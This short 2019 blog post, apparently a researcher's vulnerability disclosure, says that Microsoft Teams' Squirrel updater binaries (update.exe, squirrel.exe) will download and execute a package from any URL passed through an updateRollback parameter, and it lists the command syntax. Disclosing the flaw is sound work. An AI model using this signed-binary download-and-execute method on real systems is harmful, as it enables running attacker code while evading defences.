Tuesday, July 2, 2019

Update : Nuget/Squirrel uncontrolled endpoints leads to arbitrary code execution

 Part 1 : http://www.hexed.in/2019/06/nugetsquirrel-uncontrolled-endpoints.html
Found another vulnerable parameter where Microsoft Teams do remote download and execute payload.
Vulnerable parameter :
%localappdata%/Microsoft/Teams/update.exe — updateRollback=[URL to package]
%localappdata%/Microsoft/Teams/current/squirrel.exe — updateRollback=[URL to package]

Note : It is affecting wide usage of squirrel packages, Hope Microsoft Teams will be fixed as soon as possible.


Post a Comment